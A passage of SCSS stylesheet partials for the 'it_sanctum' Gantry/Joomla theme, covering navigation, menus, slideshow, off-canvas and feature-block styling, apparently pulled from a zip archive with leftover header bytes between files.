					cursor: pointer;
					display: inline-block;
					@include transition(0.2s);
					&:hover {
						color: $white;
						background: $accent-color-1;
						border-color: $accent-color-1;
					}
					@include breakpoint(mobile-only) {
						width: 2.5rem;
						height: 2.5rem;
						line-height: 1.5rem;
						padding: 0.5rem;
					}
				}
				.g-media-box-play {
					position: absolute;
					margin-top: -2.5rem;
				}
				.g-item-text {
					visibility: hidden;
					position: absolute;
					width: 0;
					height: 0;
				}
			}
			
			.g-media-box-desc {
				margin: 1.5rem 0;
				padding-bottom: 1.5rem;
				border-bottom: 1px solid $base-border-color;
			}
			.g-media-box-special1, .g-media-box-special2 {
				margin: 0;
			}
		}
	}
}PK!��PRCC'it_sanctum/scss/sanctum/_extension.scssnu&1i�#g-extension {
	padding: $section-padding 0;
	background-color: $extension-background-color;
	@if $extension-background-image {
    	background-image: url($extension-background-image);
    	background-repeat: unquote($extension-background-repeat);
    	background-size: unquote($extension-background-size);
    	background-attachment: unquote($extension-background-attachment);
	}
	color: $extension-text-color;
	h1, h2, h3, h4, h5, h6, strong {
		color: $extension-heading-color;
	}
}

@media print {
	#g-extension {
		background: #fff !important;
		color: #000 !important;
	}
}PK!�b�?#it_sanctum/scss/sanctum/_intro.scssnu&1i�#g-intro {
	padding: $section-padding 0;
	background-color: $intro-background-color;
	@if $intro-background-image {
    	background-image: url($intro-background-image);
    	background-repeat: unquote($intro-background-repeat);
    	background-size: unquote($intro-background-size);
    	background-attachment: unquote($intro-background-attachment);
	}
	color: $intro-text-color;
	h1, h2, h3, h4, h5, h6, strong {
		color: $intro-heading-color;
	}
}

@media print {
	#g-intro {
		background: #fff !important;
		color: #000 !important;
	}
}PK!:�.�MM(it_sanctum/scss/sanctum/_mainbottom.scssnu&1i�#g-mainbottom {
	padding: $section-padding 0;
	background-color: $mainbottom-background-color;
	@if $mainbottom-background-image {
    	background-image: url($mainbottom-background-image);
    	background-repeat: unquote($mainbottom-background-repeat);
    	background-size: unquote($mainbottom-background-size);
    	background-attachment: unquote($mainbottom-background-attachment);
	}
	color: $mainbottom-text-color;
	h1, h2, h3, h4, h5, h6, strong {
		color: $mainbottom-heading-color;
	}
}

@media print {
	#g-mainbottom {
		background: #fff !important;
		color: #000 !important;
	}
}PK!�X���(it_sanctum/scss/sanctum/_navigation.scssnu&1i�#g-navigation {
	background-color: $navigation-background-color;
	@if $navigation-background-image {
    	background-image: url($navigation-background-image);
    	background-repeat: unquote($navigation-background-repeat);
    	background-size: unquote($navigation-background-size);
    	background-attachment: unquote($navigation-background-attachment);
	}
	color: $navigation-text-color;
	text-align: center;
	position: relative;
	z-index: 1002;

	h1, h2, h3, h4, h5, h6, strong {
		color: $navigation-heading-color;
	}

	> .g-container {
		position: relative;
	}

	.g-content {
		padding-top: 0;
		padding-bottom: 0;
		margin-top: 0;
		margin-bottom: 0;
	}
	
	&.uk-active[data-uk-sticky] {
		box-shadow: 0 3px 3px rgba(0, 0, 0, 0.05);
	}

}

.uk-sticky-placeholder {
	 #g-navigation {
		.uk-active {
			box-shadow: 0 3px 3px rgba(0, 0, 0, 0.05);
		}
	}
}

#g-navigation, #g-header {
	.align-left {
		.g-toplevel {
			justify-content: flex-start;
			-webkit-justify-content: flex-start;
		}
	}

	.align-right {
		.g-toplevel {
			justify-content: flex-end;
			-webkit-justify-content: flex-end;
		}
	}
}

@media print {
	#g-navigation {
		background: #fff !important;
		color: #000 !important;
	}
}
PK!��!�%�%/it_sanctum/scss/sanctum/_features-particle.scssnu&1i�// Set the variable defaults in case they are missing in the template
$base-title-color: #4d4d4d !default;

// The code base was refactored but we need to keep the markup (.g-features-particle and .g-features2-particle) separated for backward compatibility.

// All Styles
.g-features-particle, .g-features2-particle {
	margin-left: -($content-padding);
	margin-right: -($content-padding);
	.g-grid {
		margin-bottom: ($content-padding + $content-margin)*1.5;
		&:last-child {
			margin-bottom: 0;
			.g-features-particle-item {
				&:last-child {
					@include breakpoint(mobile-only) {
						margin-bottom: 0;
					}
				}
			}
		}
		@include breakpoint(mobile-only) {
			margin-bottom: 0;
		}
	}
	.g-features-particle-item, .g-features2-particle-item {
		@include breakpoint(mobile-only) {
			margin-bottom: ($content-margin + $content-padding)*1.5;
		}
	}
	.size-33 {
		@include flex(0 33.3333%);
		width: 33.3333%;
		@include breakpoint(mobile-only) {
			@include flex(0 100%);
			width: 100%;
		}
	}

	.size-16 {
		@include flex(0 16.6666%);
		width: 16.6666%;
		@include breakpoint(mobile-only) {
			@include flex(0 100%);
			width: 100%;
		}
	}
	.g-content {
		margin: 0;
		padding-top: 0;
		padding-bottom: 0;
	}
	p {
		margin: 0;
	}
	.g-features-particle-button, .g-features-particle-subs {
		margin-top: 20px;
	}
}

// Style 1, 6, 7 and 8
.g-features-particle {
	text-align: center;
	.g-features-particle-title {
		margin-top: 0.75rem;
		margin-bottom: 1rem;
		a {
			color: $base-title-color;
			&:hover {
				color: $accent-color-1;
			}
		}
	}
	.g-features-particle-icon, .g-circle-border {
		border-radius: 50%;
		font-size: 2rem;
		height: 100px;
		width: 100px;
		line-height: 100px;
		text-align: center;
		vertical-align: middle;
		margin-bottom: 0.75rem;
		color: $accent-color-1;
		position: relative;
		display: inline-block;
		@include transition(all 0.2s linear 0s);
	}
	.g-circle-border {
		background: transparent none repeat scroll 0 0;
		border: 1px solid $base-border-color;
		height: 98px;
		width: 98px;
		left: 1px;
		top: 1px;
		z-index: 1;
		position: absolute;
		@include transition-timing-function(cubic-bezier(0.5, -0.7, 0.67, 0.7));
	}
	.g-features-particle-image {
		margin-bottom: 0.75rem;
		display: inline-block;
	}
	.g-features-particle-item {
		.g-content {
			&:hover {
				.g-features-particle-icon {
					color: #ffffff;
					background: $accent-color-1;
				}
				.g-circle-border {
					border-color: $accent-color-1;
					@include transform(scale(1.18));
					@include transition-timing-function(cubic-bezier(0.4, 0.25, 0.14, 1.73));
				}

			}
		}
	}
	&.style6 {
		.g-grid {
			margin-bottom: $content-padding*2;
			.g-block {
				padding: 0 $content-padding;
			}
			&:last-child {
				margin-bottom: 0;
				.g-features-particle-item {
					&:last-child {
						@include breakpoint(mobile-only) {
							margin-bottom: 0;
						}
					}
				}
			}
			@include breakpoint(mobile-only) {
				margin-bottom: 0;
			}
		}
		.g-features-particle-item {
			@include breakpoint(mobile-only) {
				margin-bottom: $content-padding*2;
			}
		}
		.g-content {
			padding: 3rem 2.5rem;
			background: #ffffff;
			border: 1px solid $base-border-color;
		}
		.g-features-particle-icon, .g-features-particle-image {
			margin-bottom: 1.25rem;
		}
		.g-features-particle-title {
			margin-bottom: 1.5rem;
		}
		.g-features-particle-button, .g-features-particle-subs {
			margin-top: 30px;
		}
		.g-subs-item {
			padding: 10px 0;
			border-bottom: 1px solid $base-border-color;
			&:last-child {
				border-bottom: none;
			}
		}
	}
	&.style7 {
		.g-grid {
			margin-bottom: $content-padding*2;
			.g-block {
				padding: 0 $content-padding;
			}
			&:last-child {
				margin-bottom: 0;
				.g-features-particle-item {
					&:last-child {
						@include breakpoint(mobile-only) {
							margin-bottom: 0;
						}
					}
				}
			}
			@include breakpoint(mobile-only) {
				margin-bottom: 0;
			}
		}
		.g-features-particle-item {
			margin-top: 40px;
			@include breakpoint(mobile-only) {
				margin-bottom: $content-padding*2;
			}
		}
		.g-content {
			padding: 25px;
			background: #ffffff;
			border: 1px solid $base-border-color;
			@include transition(all 0.3s);
			&:hover {
				border-color: $accent-color-2;
				.g-features-particle-icon {
					background: $accent-color-2
				}
			}
		}
		.g-features-particle-item-inner {
			margin-top: -64px;
		}
		.g-features-particle-icon, .g-features-particle-image {
			margin-bottom: 1.25rem;
			.g-circle-border {
				display: none;
			}
		}
		.g-features-particle-icon {
			width: 75px;
			height: 75px;
			line-height: 75px;
			border-radius: 0;
			background: $accent-color-1;
			color: #ffffff;
			font-size: 24px;
			@include transition(all 0.3s);
		}
		.g-features-particle-title {
			margin-bottom: 1rem;
			text-transform: uppercase;
		}
		.g-features-particle-button, .g-features-particle-subs {
			margin-top: 30px;
		}
		.g-subs-item {
			padding: 10px 0;
			border-bottom: 1px solid $base-border-color;
			&:last-child {
				border-bottom: none;
			}
		}
	}
	&.style8 {
		margin-left: 0;
		margin-right: 0;
		color: #ffffff;
		text-align: left;
		.g-grid {
			margin-bottom: 0;
			&:last-child {
				.g-features-particle-item {
					box-shadow: -20px 0 20px -20px rgba(0, 0, 0, 0.07) inset;
					@include breakpoint(mobile-only) {
						box-shadow: 0 -20px 20px -20px rgba(0, 0, 0, 0.07) inset;
					}
					&:last-child {
						box-shadow: 0 0 20px -20px rgba(0, 0, 0, 0.07) inset;
					}
				}
			}
		}
		.g-features-particle-item {
			padding: 35px 30px 40px;
			box-shadow: -20px -20px 20px -20px rgba(0, 0, 0, 0.07) inset;
			&:nth-child(1) {
				background: darken($accent-color-1, 8%);
			}
			&:nth-child(2) {
				background: darken($accent-color-1, 4%);
			}
			&:nth-child(3) {
				background: $accent-color-1;
			}
			&:nth-child(4) {
				background: lighten($accent-color-1, 4%);
			}
			&:nth-child(5) {
				background: lighten($accent-color-1, 8%);
			}
			&:nth-child(6) {
				background: lighten($accent-color-1, 12%);
			}
			&:last-child {
				box-shadow: 0 -20px 20px -20px rgba(0, 0, 0, 0.07) inset;
			}
			@include breakpoint(mobile-only) {
				box-shadow: 0 -20px 20px -20px rgba(0, 0, 0, 0.07) inset;
				margin-bottom: 0;
			}
		}
		.g-features-particle-icon, .g-features-particle-image {
			margin-bottom: 10px;
			color: #ffffff;
			border-radius: 0;
			width: auto;
			height: auto;
			line-height: inherit;
			font-size: 40px;

			.g-circle-border {
				display: none;
			}
		}
		.g-features-particle-title {
			color: #ffffff !important;
			font-size: 1.35rem;
			a {
				color: #ffffff;
				&:hover {
					text-decoration: underline;
				}
			}
		}
		.g-features-particle-desc, .g-features-particle-subs {
			opacity: 0.85;
		}
		.g-features-particle-button {
			margin-top: 25px;
			.button {
				background: none;
				border: 2px solid #ffffff;
				color: #ffffff;
				border-radius: 50px;
				@include transition(all 0.2s);
				&:hover {
					background: $base-title-color;
					border-color: $base-title-color;
				}
			}
		}
		&.pull-up {
			margin-top: -7.5rem;
			position: relative;
			z-index: 4;
		}
	}
}

// Style 2, 3, 4 and 5 
.g-features2-particle {
	.g-features2-particle-title {
		margin-top: 0;
		margin-bottom: 1rem;
		a {
			color: $base-title-color;
			&:hover {
				color: $accent-color-1;
			}
		}
	}
	.g-features2-particle-icon {
		margin-right: 20px;
		color: $accent-color-1;
		font-size: 130%;
	}
	.g-features2-particle-image {
		margin-right: 20px;
		display: inline-block;
	}
	&.style3 {
		.g-grid {		
			.g-block {
				padding: 0 1rem;
			}
		}
		.g-content {
			padding-top: 1rem;
			padding-bottom: 1rem;
			background: rgba(0,0,0,0.2);
			&:after {
				content: "";
				width: 0;
				height: 0;
				border-top: 15px solid rgba(0,0,0,0.2);
				border-right: 15px solid transparent;
				position: absolute;
				margin-top: 16px;
				margin-left: -15px;
				z-index: 99;
			}
		}
	}
	&.style4 {
		.g-features2-particle-icon {
			float: left;
			font-size: 55px;
			margin-right: 0;
			color: lighten($base-text-color, 15%);
		}
		.g-features2-particle-image {
			float: left;
			margin: 5px 0 0;
			max-width: 60px;
		}
		.g-title-desc-container {
			margin-left: 75px;
		}
		.g-features2-particle-title {
			margin-bottom: 10px;
		}
		.accent1 {
			.g-features2-particle-icon {
				color: $accent-color-1;
			}
		}
		.accent2 {
			.g-features2-particle-icon {
				color: $accent-color-2;
			}
		}
	}
	&.style5 {
		.g-features2-particle-icon {
			float: left;
			font-size: 24px;
			margin-right: 0;
			color: lighten($base-text-color, 10%);
			width: 60px;
			height: 60px;
			line-height: 60px;
			text-align: center;
			margin-top: 5px;
			border: 1px solid;
			border-radius: 50%;
		}
		.g-features2-particle-image {
			float: left;
			margin: 5px 0 0;
			width: 60px;
			height: 60px;
			img {
				border-radius: 50%;
				width: 60px;
				height: 60px;
			}
		}
		.g-title-desc-container {
			margin-left: 75px;
		}
		.g-features2-particle-title {
			margin-bottom: 10px;
		}
		.accent1 {
			.g-features2-particle-icon {
				color: $accent-color-1;
			}
		}
		.accent2 {
			.g-features2-particle-icon {
				color: $accent-color-2;
			}
		}
	}
}PK!6x�

(it_sanctum/scss/sanctum/_variations.scssnu&1i�.flush {
	.g-container {
		> .g-grid {
			> .g-block {
				> .g-content {
					margin: 0;
					padding: 0;
				}
			}
		}
	}
}

.text-center, .title-center {
	.g-title {
		text-align: center;
		margin-bottom: 40px;
		&:before {
			content: "\f432";
			font-family: "Ionicons";
			font-size: 36px;
			color: $accent-color-1;
			margin: 0 auto;
			display: block;
			@include breakpoint(mobile-only) {
				display: none;
			}
			@include breakpoint(tablet-range) {
				width: 80px;
			}
		}
		&:after {
			display: none;
		}
	}
	.g-particle-intro {
		.g-title {
			&:before, &:after {
				display: none;
			}
		}
	}
}

.title-border {
	.g-title {
		&:before, &:after {
			display: none;
		}
		border-bottom: 1px solid $base-border-color;
		padding-bottom: 10px;
	}
	.g-particle-intro {
		.g-title {
			border-bottom: none;
			padding-bottom: 0;
		}
	}
}

.title-clean {
	.g-title {
		&:before, &:after {
			display: none;
		}
	}
}

[class*="box"] {
	&.g-block {
		> .g-content {
			margin: $content-margin*2.5
		}
	}
}

.box1 {
	&.moduletable,
	&.widget,
	&.g-outer-box,
	> .g-content {
		padding: 25px;
		border: 1px solid $base-border-color;
		background: #ffffff;
		.g-title {
			&:before, &:after {
				display: none;
			}
			border-bottom: 1px solid $base-border-color;
			padding-bottom: 15px;
		}
		.g-particle-intro {
			.g-title {
				margin-bottom: 30px;
			}
			.g-title-separator {
				display: none;
			}
		}
	}
}

.box2 {
	&.moduletable,
	&.widget,
	&.g-outer-box,
	> .g-content {
		padding: 25px;
		border: 1px solid $base-border-color;
		background: lighten($base-border-color,8%);
		.g-title {
			&:before, &:after {
				display: none;
			}
			border-bottom: 1px solid $base-border-color;
			padding-bottom: 15px;
		}
		.g-particle-intro {
			.g-title {
				margin-bottom: 30px;
			}
			.g-title-separator {
				display: none;
			}
		}
	}
}

.box3 {
	&.moduletable,
	&.widget,
	&.g-outer-box,
	> .g-content {
		padding: 25px;
		background: $accent-color-1;
		color: #ffffff;
		.g-title {
			&:before, &:after {
				display: none;
			}
			color: #ffffff !important;
			border-bottom: 1px solid lighten($accent-color-1, 15%);
			padding-bottom: 15px;
		}
		.g-particle-intro {
			.g-title {
				margin-bottom: 30px;
			}
			.g-title-separator {
				display: none;
			}
		}
		.button {
			background: $base-title-color;
			&:hover {
				background: lighten($base-title-color, 10%);
			}
		}
		a {
			color: $base-border-color;
			&:hover {
				color: darken($base-border-color, 5%);
			}
		}
	}
}

.box4 {
	&.moduletable,
	&.widget,
	&.g-outer-box,
	> .g-content {
		padding: 25px;
		background: $base-title-color;
		color: #ffffff;
		.g-title {
			&:before, &:after {
				display: none;
			}
			color: #ffffff !important;
			border-bottom: 1px solid lighten($base-title-color, 10%);
			padding-bottom: 15px;
		}
		.g-particle-intro {
			.g-title {
				margin-bottom: 30px;
			}
			.g-title-separator {
				display: none;
			}
		}
		.button {
			&:hover {
				background: lighten($accent-color-1, 10%);
			}
		}
	}
}

.shadow {
	.g-content {
		box-shadow: 1px 1px 1px rgba(0,0,0,0.1);
	}
}

.shadow2 {
	.g-content {
		box-shadow: 0 0 4px rgba(0,0,0,0.15);
	}
}

.disabled {
	.g-content {
		opacity: 0.4;
	}
}

.square {
	.g-content {
		border-radius: none;
	}
}

.rounded {
	.g-content {
		border-radius: $core-border-radius;
	}
}PK!(�C��"it_sanctum/scss/sanctum/_menu.scssnu&1i�#g-navigation {
	// Menu Styling
	.g-main-nav {
		margin: 0;

		.g-toplevel {

			> li {
				margin: 0 5px;
				text-transform: uppercase;
				@include breakpoint(tablet-range) {
					margin: 0;
				}
				&:last-child {

				}
				> .g-menu-item-container {
					color: $navigation-text-color;
					padding: 1rem;
					@include breakpoint(tablet-range) {
						padding: 0.5rem;
					}
					@include breakpoint(mobile-only) {
						padding: 0.5rem;
					}

					a {
						color: $navigation-text-color;
						&:hover {
							color: $accent-color-1;
						}
					}
					.g-menu-item-title {
						
					}
					.g-menu-parent-indicator {					
						&:after {
							content: "\f107";
							opacity: 0.75;
							padding: 0.1rem;
							border: 1px solid $base-border-color;
							background: darken($navigation-background-color, 3%);
							margin-left: 2px;
							border-radius: 4px;
							width: 1.2rem;
							text-align: center;
						}
					}
				}
				&:hover, &.active {
					> .g-menu-item-container {
						color: $accent-color-1;
						.g-menu-item-title {
							
						}						
						> .g-selected {
							color: $accent-color-1;
						}
					}
				}
				&.g-parent .g-menu-parent-indicator {
					//vertical-align: top;
				}
			}
		}

		.g-dropdown {
			text-transform: initial;
			color: $white;
			background: rgba(0,0,0,0.8);
			font-family: get-font-family($fonts-body-font);
			//border: 1px solid darken($accent-color-1, 15%);
			border-radius: 0;
			box-shadow: 0 6px 6px rgba(0, 0, 0, 0.05);
			> .g-dropdown-column {
				//border: 1px solid transparent;
			}
			.g-menu-item-container {
				color: $white;
				padding: 12px 15px;
				//&:hover {
					//color: $accent-color-1;
				//}
			}
			li {
				border-bottom: 1px solid rgba(255, 255, 255, 0.1);
			}
			.g-dropdown-column {
				border-bottom: none;
			}
		}

		.g-sublevel {
			> li {
				> .g-menu-item-container {
					color: $white;
					font-weight: normal;
					> .g-selected {
						color: $white;
						font-weight: normal;
						background: $accent-color-1;					
					}					
				}

				&:hover, &.active {
					> .g-menu-item-container {
						background: $accent-color-1;
						color: $white;
						> .g-selected {
							background: $accent-color-1;
							color: $white;
						}
					}
				}
				&.active {
					> .g-menu-item-container {
						color: $white;
					}
				}
				&.g-menu-item-type-particle {
					&:hover, &.active {
						> .g-menu-item-container {		

						}
					}				
				}

				&:last-child {
					border-bottom: none;					
				}

				&.g-menu-item-type-particle {
					&:hover {
						> .g-menu-item-container {
							background: inherit;
						}	
					}
				}
			}
		}
	}	
	.g-menu-block {
		@include breakpoint(mobile-only) {
			display: none;
		}		
	}	
	.g-menu-item-subtitle {
		font-size: 0.75rem;
		font-weight: normal;
		opacity: 1;
		padding-top: 5px;
	}
}

.menu-item-particle {
	a {
		color: $accent-color-1;
		&:hover {
			color: $navigation-text-color;
		}
	}
}PK!��*II'it_sanctum/scss/sanctum/_slideshow.scssnu&1i�.g-slideshow {
    .uk-overlay-panel {
        padding: 25px;
        @include breakpoint(mobile-only) {
            padding: 15px;
            &.uk-overlay-left {
                top: auto;
                bottom: 0;
                right: 0;
                width: 100%;
            }
            &.uk-overlay-right {
                top: auto;
                bottom: 0;
                left: 0;
                width: 100%
            }
        }
        @include breakpoint(tablet-range) {
            padding: 15px;
            &.uk-overlay-left {
                top: auto;
                bottom: 0;
                right: 0;
                width: 100%;
            }
            &.uk-overlay-right {
                top: auto;
                bottom: 0;
                left: 0;
                width: 100%
            }
        }
        @include breakpoint(desktop-range) {
            padding: 15px;
        }
    }
    .g-overlay-container {
        width: $breakpoints-large-desktop-container;
        margin-left: auto;
        margin-right: auto;
        padding-left: 25px !important;
        padding-right: 25px !important;
        @include breakpoint(desktop-range) {
            width: $breakpoints-desktop-container;
        }
        @include breakpoint(tablet-range) {
            width: $breakpoints-tablet-container;
        }
        @include breakpoint(large-mobile-range) {
            width: $breakpoints-large-mobile-container;
        }
        @include breakpoint(small-mobile-range) {
            width: 100%;
        }
    }
    .nav-visible {
        .uk-slidenav {
            opacity: 1;
        }
    }
    .g-slideshow-title {
        margin: 0 0 15px;
        color: #ffffff !important;
        @include breakpoint(mobile-only) {
            margin: 0;
            font-size: 1rem;
        }
    }
    .g-slideshow-desc {
        margin: 0;
        @include breakpoint(mobile-only) {
            display: none;
        }
        a:not(.button) {
            color: $accent-color-1;
            &:hover {
                text-decoration: underline;
            }
        }
    }
    .g-slideshow-buttons {
        margin: 25px 0 0;
        @include breakpoint(mobile-only) {
            margin: 15px 0 0;
        }
        .button {
            margin-right: 15px;
            border: 2px solid $accent-color-1;
            @include transition(all 0.3s);
            &:hover {
                background: lighten($accent-color-1, 8%);
                border-color: lighten($accent-color-1, 8%);

            }
            &:last-child {
                margin-right: 0;
            }
            > span {
                margin-right: 10px;
            }
            @include breakpoint(mobile-only) {
                display: block;
                margin-right: 0;
                margin-bottom: 15px;
                &:last-child {
                    margin-bottom: 0;
                }
            }
            @include breakpoint(tablet-range) {
                display: block;
                margin-right: 0;
                margin-bottom: 15px;
                &:last-child {
                    margin-bottom: 0;
                }
            }
            &.empty {
                background: none;
                border: 2px solid $accent-color-1;
                color: $accent-color-1;
                &:hover {
                    background: $accent-color-1;
                    border-color: $accent-color-1;
                    color: #ffffff;
                }
            }
        }
    }
    .uk-flex-center {
        text-align: center;
    }
    .style2 {
        padding: 70px 0;
        .g-slideshow-title {
            padding: 15px 25px;
            background: #ffffff;
            color: #1a1a1a !important;
            font-size: 2rem;
            display: table;
            margin-bottom: 20px;
        }
        .g-slideshow-desc {
            padding: 15px 20px;
            background: #1a1a1a;
            color: #ffffff !important;
            font-size: 1.2rem;
            display: table;
        }
        .g-slideshow-buttons {
            .button {
                font-size: 1.2rem;
                &.standard {
                    background: #ffffff;
                    border-color: #ffffff;
                    color: #1a1a1a;
                    &:hover {
                        background: #1a1a1a;
                        border-color: #1a1a1a;
                        color: #ffffff
                    }
                }
                &.empty {
                    border-color: #ffffff;
                    color: #ffffff;
                    &:hover {
                        background: #1a1a1a;
                        border-color: #1a1a1a;
                        color: #ffffff
                    }
                }
            }
        }
        &.uk-flex-right {
            .g-slideshow-title, .g-slideshow-desc {
                margin-left: auto;
            }
        }
        &.uk-flex-center {
            .g-slideshow-title {
                margin: 0 auto 20px;
            }
            .g-slideshow-desc {
                margin: auto;
            }
        }
    }
    .style3 {
        .g-slideshow-title {
            font-size: 2rem;
            @include breakpoint(mobile-only) {
                font-size: 1.2rem;
            }
            @include breakpoint(tablet-range) {
                font-size: 1.4rem;
            }
        }
        .g-slideshow-desc {
            font-size: 17px;
            line-height: 30px;
        }
    }
    .dark-text {
        .style3 {
            .g-slideshow-title {
                color: $base-text-color !important;
            }
            .g-slideshow-desc {
                color: $base-text-color;
            }
        }
    }
    .uk-dotnav{
        margin: 0 0 35px;
    }
    .g-slideshow-item {
        iframe {
            pointer-events: auto !important;
        }
    }
    .slideshow-caption {
        &.uk-overlay-background {
            padding: 25px;
        }
    }
    .uk-overlay-left-short {
        @include transform(translateX(-10%));
    }
    .uk-overlay-right-short {
        @include transform(translateX(10%));
    }
    .uk-overlay-top-short {
        @include transform(translateY(-10%));
    }
    .uk-overlay-bottom-short {
        @include transform(translateY(10%));
    }
    .uk-overlay-scale {
        @include transform(scale(0.8));
    }
    .uk-overlay-left-short, .uk-overlay-right-short, .uk-overlay-top-short, .uk-overlay-bottom-short {
        @include transition-duration(0.5s);
    }
    .uk-overlay-active {
        .uk-active {
            .uk-overlay-scale {
                @include transform(scale(1));
            }
        }
    }
    audio, canvas, video {
        display: block;
    }
}

#g-fullwidth, .g-flushed {
    .g-slideshow {
        .g-content {
            margin: $content-margin;
            padding: $content-padding;
        }
    }
}PK!�&�R%%$it_sanctum/scss/sanctum/_drawer.scssnu&1i�#g-drawer {
	padding: $section-padding 0;
	background-color: $drawer-background-color;
	@if $drawer-background-image {
    	background-image: url($drawer-background-image);
    	background-repeat: unquote($drawer-background-repeat);
    	background-size: unquote($drawer-background-size);
    	background-attachment: unquote($drawer-background-attachment);
	}
	color: $drawer-text-color;
	h1, h2, h3, h4, h5, h6, strong {
		color: $drawer-heading-color;
	}
}

@media print {
	#g-drawer {
		background: #fff !important;
		color: #000 !important;
	}
}PK!<�Ħ'it_sanctum/scss/sanctum/_offcanvas.scssnu&1i�#g-offcanvas {
	background: $offcanvas-background;
	width: $offcanvas-width;
	color: $offcanvas-text-color;
	a {
		color: lighten($offcanvas-background, 50%);
		&:hover {
			color: $offcanvas-text-color;
		}
	}

	h1, h2, h3, h4, h5, h6, strong {
		color: $offcanvas-text-color;
	}

	.button {
		background: $accent-color-2;
		color: $offcanvas-text-color;
		&:hover {
			background: lighten($accent-color-2, 5%);
		}
		&:active {
			background: darken($accent-color-2, 5%);
		}
	}
}

@if $offcanvas-toggle-position == "left" {
	.g-offcanvas-toggle {
		font-size: $fontsizes-body-font-size + 0.7;
		color: $offcanvas-toggle-color;
		text-align: center;
		top: 0;
		left: initial;
		position: relative;
	}

	.g-offcanvas-right {
		.g-offcanvas-toggle {
		}
	}
}

@if $offcanvas-toggle-position == "right" {
	.g-offcanvas-toggle {
		font-size: $fontsizes-body-font-size + 0.7;
		color: $offcanvas-toggle-color;
		text-align: center;
		top: 0;
		right: initial;
		position: relative;
	}

	.g-offcanvas-right {
		.g-offcanvas-toggle {
		}
	}
}

// Mobile Menu
#g-offcanvas {
	#g-mobilemenu-container {
		ul {
			background: $offcanvas-background;
			> li {
				@include transition(background 0.2s, color 0.2s);
				&.g-menu-item-type-particle {
					display: none !important;
				}
				> .g-menu-item-container {
					color: $offcanvas-text-color;
					border-bottom: 1px solid darken($offcanvas-background, 6%);
				}
				&:not(.g-menu-item-type-particle):not(.g-menu-item-type-module) {
					&:hover, &.active {
						background: lighten($base-element-color, 10%);

						> .g-menu-item-container {
							color: darken($offcanvas-text-color, 20%);
						}
					}
					&.active {
						> .g-menu-item-container {
							color: $white;
							background: $accent-color-1;
						}
					}
				}
				&.g-menu-item-link-parent {
					> .g-menu-item-container {
						> .g-menu-parent-indicator {
							color: #ffffff;
							background: rgba(0,0,0,0.3);
							@include transition(background 0.2s, color 0.2s, border-color 0.2s);
							&:hover {
								background: rgba(0,0,0,0.5);
							}
							border-radius: $core-border-radius;
							margin: -0.2rem 0 -0.2rem 0.5rem;
							padding: 0.2rem;
							&:after {
								content: "\f105";
								opacity: 0.75;
							}
						}
					}
				}
				&.g-parent {
					.g-menu-parent-indicator {
						&:after {
							content: "\f105";
						}
						padding-right: 0.2rem;
					}
				}
			}
			.g-dropdown-column {
				width: $offcanvas-width;
			}
		}
	}
}

#g-mobilemenu-container {
	margin: -($content-padding + $content-margin);
}

// Nav Overlay
.g-nav-overlay, .g-menu-overlay {
	background: $offcanvas-overlay;
}

@media print {
	#g-offcanvas {
		background: #fff !important;
		color: #000 !important;
	}
}

.g-offcanvas-open {
	&.g-offcanvas-css2 {
	    .g-offcanvas-left {
	        #g-page-surround {
	            left: $offcanvas-width;
	        }
	    }

	    .g-offcanvas-right {
	        #g-page-surround {
	            right: $offcanvas-width;
	        }
	    }
	}
}

.g-offcanvas-open {
	.g-nav-overlay {
		z-index: 1010;
	}
	&.g-offcanvas-css2 {
		.g-offcanvas-left {
			#g-header, #g-top {
				&.uk-active {
					margin-left: $offcanvas-width;
				}
			}
		}
		.g-offcanvas-right {
			#g-header, #g-top {
				&.uk-active {
					margin-left: -$offcanvas-width;
				}
			}
		}
	}
}

.g-offcanvas-closing {
	&.g-offcanvas-css2 {
		.g-offcanvas-left {
			#g-header, #g-top {
				&.uk-active {
					margin-left: 0;
				}
			}
		}
		.g-offcanvas-right {
			#g-header, #g-top {
				&.uk-active {
					margin-left: 0;
				}
			}
		}
	}
}

// Fix for the UIkit Sticky Header in IE 10 and 11
@media all and (-ms-high-contrast: none), (-ms-high-contrast: active) {
.g-offcanvas-open {
	.g-nav-overlay {
		z-index: 1010;
	}
	.g-offcanvas-left {
		#g-header, #g-top {
			&.uk-active {
				margin-left: $offcanvas-width;
			}
		}
	}
	.g-offcanvas-right {
		#g-header, #g-top {
			&.uk-active {
				margin-left: -$offcanvas-width;
			}
		}
	}
}

.g-offcanvas-closing {
	.g-offcanvas-left {
		#g-header, #g-top {
			&.uk-active {
				margin-left: 0;
			}
		}
	}
	.g-offcanvas-right {
		#g-header, #g-top {
			&.uk-active {
				margin-left: 0;
			}
		}
	}
}
}

#g-header, #g-top {
	&.uk-active {
		@include transition(margin 0.3s);
	}
}

.g-nav-overlay, .g-menu-overlay {
	@include transition(opacity 0.3s ease-out 0s, z-index 0s);
}PK!�?*it_sanctum/scss/sanctum/_main-feature.scssnu&1i�.g-main-feature {
	margin-left: -($content-padding);
	margin-right: -($content-padding);
	.g-main-feature-left {
		.g-content {
			margin: 0 $content-margin 0 0;
			padding-top: 0;
			padding-bottom: 0;
		}
	}
	.g-main-feature-right {
		.g-content {
			margin: 0 0 0 $content-margin;
			padding-top: 0;
			padding-bottom: 0;
		}
		&.align-right {
			text-align: right;
		}
	}
	.g-main-feature-title {
		margin-top: -5px;
	}
	.image-bottom {
		margin-bottom: -($content-margin + $content-padding + $section-padding);
	}
	.g-main-feature-link {
		margin-top: 5px;
		i {
			margin-right: 10px;
		}
		&.g-button2 {
			margin-left: 25px;
			@include breakpoint(small-mobile-range) {
				margin-left: 0;
			}
		}
		@include breakpoint(small-mobile-range) {
			display: block;
		}
	}
	.g-main-feature-desc {
		i {
			margin-right: 8px;
		}
	}
	.image-block {
		@include breakpoint(tablet-range) {
			display: none;
		}
		@include breakpoint(mobile-only) {
			display: none;
		}
	}
}PK!3�����$it_sanctum/scss/sanctum/_tables.scssnu&1i�table {
	border: 1px solid lighten($base-border-color,2%);
}

th {
	background: lighten($base-border-color,5%);
	padding: 0.5rem;
}

td {
	padding: 0.5rem;
	border: 1px solid lighten($base-border-color,2%); 
}PK!�|}���'it_sanctum/scss/sanctum/_fullwidth.scssnu&1i�#g-fullwidth {
	padding: 0;
	> .g-container {
		width: 100%;
		padding: 0;
		margin: 0;
	}
	.g-content {
		padding: 0;
		margin: 0;
	}
	background-color: $fullwidth-background-color;
	@if $fullwidth-background-image {
    	background-image: url($fullwidth-background-image);
    	background-repeat: unquote($fullwidth-background-repeat);
    	background-size: unquote($fullwidth-background-size);
    	background-attachment: unquote($fullwidth-background-attachment);
	}
	color: $fullwidth-text-color;
	h1, h2, h3, h4, h5, h6, strong {
